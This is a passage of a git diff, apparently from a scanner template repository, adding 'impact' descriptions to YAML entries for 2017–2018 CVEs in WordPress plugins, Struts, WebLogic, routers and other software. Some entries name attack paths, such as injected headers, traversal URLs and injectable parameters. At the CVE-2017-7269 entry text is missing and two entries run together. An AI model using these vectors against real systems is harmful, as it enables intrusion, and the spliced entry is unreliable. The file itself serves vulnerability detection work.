index 7834cba252..f2246f9169 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Stop User Enumeration 1.3.7 and earlier are vulnerable to unauthenticated reflected cross-site scripting. + impact: | + This vulnerability allows remote attackers to execute arbitrary script or HTML code in the context of the victim's browser, potentially leading to session hijacking, phishing attacks, or defacement of the affected website. remediation: | Update to the latest version of the WordPress Stop User Enumeration plugin (1.3.7) or apply the provided patch to fix the vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 659b3de1c1..64bfb69d11 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -5,6 +5,8 @@ info: author: pussycat0x severity: medium description: WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update to the latest version of the WordPress Qards plugin, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index 21366ae735..345f609e7b 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to server-side request forgery (SSR)F. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. + impact: | + An attacker can exploit this vulnerability to access internal resources, potentially leading to unauthorized access, data leakage, or further attacks. remediation: | Upgrade to a patched version of Graphite (>=1.1.6) or apply the necessary security patches. reference: diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 3cb9a64175..d46a674688 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: high description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system. remediation: | Apply the necessary patches or updates provided by Oracle to fix this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index 481c4bd21a..2db57efc4b 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized access to sensitive information. remediation: | Apply the latest security patches or updates provided by McAfee to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml index 855f454857..6f28dfa7f2 100644 --- a/http/cves/2017/CVE-2017-5487.yaml +++ b/http/cves/2017/CVE-2017-5487.yaml @@ -5,6 +5,8 @@ info: author: Manas_Harsh,daffainfo,geeknik,dr0pd34d severity: medium description: WordPress Core before 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows a remote attacker to obtain sensitive information via a wp-json/wp/v2/users request. + impact: | + An attacker can easily determine valid usernames, which can lead to targeted attacks such as brute force attacks or social engineering. remediation: | Update WordPress to version 4.7.1 or later reference: diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index 8116c4b40c..e7f88b9c32 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -6,6 +6,8 @@ info: severity: high description: | NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential exposure of sensitive information. remediation: | Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 980f4583c9..de4d200f33 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor. reference: diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index fe34d7b79d..ef934cb107 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is susceptible to remote command injection attacks. The Jakarta Multipart parser has incorrect exception handling and error-message generation during file upload attempts, which can allow an attacker to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header. This was exploited in March 2017 with a Content-Type header containing a #cmd= string. + impact: | + Remote attackers can execute arbitrary commands on the target system. remediation: | Upgrade to Apache Struts 2.3.32 or 2.5.10.1 or apply the necessary patches. reference: diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index 42d76fe036..ff11f582fd 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Intel Active Management platforms are susceptible to authentication bypass. A non-privileged network attacker can gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability. A non-privileged local attacker can provision manageability features, gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology, Intel Standard Manageability, and Intel Small Business Technology. The issue has been observed in versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 for all three platforms. Versions before 6 and after 11.6 are not impacted. + impact: | + An attacker can bypass authentication and gain unauthorized access to the Intel Active Management firmware, potentially leading to unauthorized control of the affected system. remediation: | Update the Intel Active Management firmware to version 11.6.55, 11.7.55, 11.11.55, 11.0.25, 8.1.71, or 7.1.91 to mitigate the vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index ad9d44c25e..5c34f10fb4 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php. + impact: | + Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system. remediation: | Apply the latest patch or upgrade to a newer version of PhpColl to mitigate this vulnerability. reference: diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index a9eebf6dc0..6e2f4b56cf 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 contains a buffer overflow vulnerability in the ScStoragePathFromUrl function in the WebDAV service that could allow remote attackers to execute arbitrary code via a long header beginning with "If =6.2.17) or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index 04f08ba604..68355f03af 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index fbd4a11343..6e69774097 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK,pikpikcu severity: critical description: Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire Jenkins server. remediation: | Apply the latest security patches and updates provided by Jenkins to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index f9e1a8ec28..548929857f 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -6,6 +6,8 @@ info: severity: high description: | AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the device, potentially leading to a complete compromise of the phone and unauthorized access to the VoIP network. remediation: | Apply the latest firmware update provided by AudioCodes to fix the vulnerability and ensure proper input validation. reference: diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index 8a11077dbd..4776bae753 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Dolibarr before 7.0.2 is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to Dolibarr version 7.0.2 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index 653f661ca5..970aa24241 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Upgrade to Palo Alto Networks PAN-OS GlobalProtect VPN client version 8.1.4 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index 9059365187..6cc97c2393 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -5,6 +5,8 @@ info: author: 0x_akoko severity: high description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability. + impact: | + Successful exploitation of this vulnerability allows an attacker to read arbitrary files from the target system. remediation: | Apply the latest security patches or updates provided by Ncomputing to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index 861e184639..f28120779f 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Zend Server to version 9.13 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index 3fc4a67e12..375b6ba4f4 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with root privileges on the affected device. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-10818.yaml b/http/cves/2018/CVE-2018-10818.yaml index 76ac3674bd..b0df02d112 100644 --- a/http/cves/2018/CVE-2018-10818.yaml +++ b/http/cves/2018/CVE-2018-10818.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: LG NAS devices contain a pre-auth remote command injection via the "password" parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. remediation: | Apply the latest firmware update provided by LG to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index fb52a5ef1c..2a6b194b51 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request to the web interface. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the target system remediation: | Apply the latest firmware update provided by D-Link to fix the vulnerability reference: diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index af1b49c7d2..c5ccaec096 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -6,6 +6,8 @@ info: severity: high description: | D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and complete compromise of the affected router. remediation: | Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 063588bf3e..9d8762cf68 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -6,6 +6,8 @@ info: severity: high description: | IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system. remediation: | Update to the latest version of IPConfigure Orchid Core VMS to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index 0d602eaf9b..b5ce1ed655 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade Monstra CMS to a version higher than 3.0.4 or apply the official patch provided by the vendor. reference: diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index 71ebf9e7b3..94c94f741e 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -6,6 +6,8 @@ info: severity: high description: | OpenCart Divido plugin is susceptible to SQL injection + impact: | + This vulnerability can lead to data theft, unauthorized access, and potential compromise of the entire Opencart Divido system. remediation: | Apply the official patch or upgrade to a version that includes the fix. reference: diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index b5118a2e4c..dda8197d9e 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -5,6 +5,8 @@ info: author: harshbothra_ severity: medium description: Splunk through 7.0.1 is susceptible to information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information. remediation: | Upgrade Splunk to a version higher than 7.0.1 to mitigate the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index 9510ab55b3..4cfaa06f64 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the registration form (i.e., the login parameter to users/registration). An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index f6e9e76821..08eba880e1 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the wpForo Forum plugin (1.4.11) or apply the vendor-provided patch to fix the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 7eea3583a6..9994d88a01 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 allows specially constructed requests to expose application functionality through the reverse proxy. It is also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical. + impact: | + Unauthenticated attackers can gain unauthorized access to the Apache Tomcat Manager interface, potentially leading to further compromise of the server. remediation: | Upgrade to a patched version of Apache Tomcat JK Connect (1.2.45 or higher) or apply the recommended security patches. reference: diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 902cee9120..817e6d48f3 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace. + impact: | + Remote code execution remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2. reference: diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index 66e4fd3979..4de2355e68 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input. + impact: | + An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Upgrade to Apache Tomcat version 9.0.12 or later, or apply the relevant patch provided by the Apache Software Foundation. reference: diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index 5ad0f2efe6..5a8904a9bc 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system. remediation: | Apply the latest security patch or upgrade to a newer version of Eaton Intelligent Power Manager to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index d27be094e2..ed155d0a58 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -5,6 +5,8 @@ info: author: wisnupramoedya severity: high description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal. + impact: | + This vulnerability can lead to unauthorized access to sensitive information stored on the system, potentially exposing personal data of students, staff, and other stakeholders. remediation: | Apply the latest patch or update provided by the vendor to fix the arbitrary file read vulnerability in the Schools Alert Management Script. reference: diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index e7a0400c5f..86a8b5ec4d 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -8,6 +8,8 @@ info: Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain a CGI injection vulnerability which could be used to execute remote code. A remote unauthenticated attacker may potentially be able to use CGI variables to execute remote code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. remediation: | Apply the latest firmware updates provided by Dell to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index 4351fa57e1..d43f258ce8 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -5,6 +5,8 @@ info: author: LogicalHunter severity: medium description: OEcms 3.1 is vulnerable to reflected cross-site scripting via the mod parameter of info.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest patch or upgrade to a newer version of OEcms to fix the XSS vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 89a2a6a0e5..d69e62f154 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: high description: Seagate NAS OS version 4.3.15.1 has insufficient access control which allows attackers to obtain information about the NAS without authentication via empty POST requests in /api/external/7.0/system.System.get_infos. + impact: | + An attacker can gain sensitive information about the server, potentially leading to further attacks. remediation: | Upgrade to a patched version of Seagate NAS OS. reference: diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 0b072cd49a..88c0a90649 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter. + impact: | + Successful exploitation of this vulnerability could lead to user redirection to malicious websites, potentially resulting in the theft of sensitive information or the installation of malware. remediation: | Apply the latest security patches or updates provided by Seagate to fix the open redirect vulnerability in NAS OS 4.3.15.1. reference: diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index 9977d721cf..eae876d2b2 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication). + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: | Upgrade PhpMyAdmin to version 4.8.2 or later to fix the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index 9a7407fd1c..3327f36bf5 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station. + impact: | + An attacker can gain access to sensitive system logs, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade CirCarLife Scada to version 4.3 or above to fix the system log exposure vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 63f0ae2ffc..03146520b7 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can use this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Apply the latest firmware update provided by the vendor to fix the open redirect vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index aeb370861b..b3cc02176c 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -5,6 +5,8 @@ info: author: hetroublemakr severity: medium description: Spring MVC Framework versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported are vulnerable to local file inclusion because they allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). A malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches and updates provided by the Spring MVC Framework to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index 9b03d71764..708e03785a 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -11,6 +11,8 @@ info: An unauthenticated remote malicious user (or attacker) can supply specially crafted request parameters against Spring Data REST backed HTTP resources or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by the vendor to fix the deserialization vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index 447f26b5d3..5bdf988ca4 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Zoho manageengine is vulnerable to reflected cross-site scripting. This impacts Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or update provided by Zoho ManageEngine to fix the XSS vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index 6ad8f9c683..c59a4ccf62 100644 --- 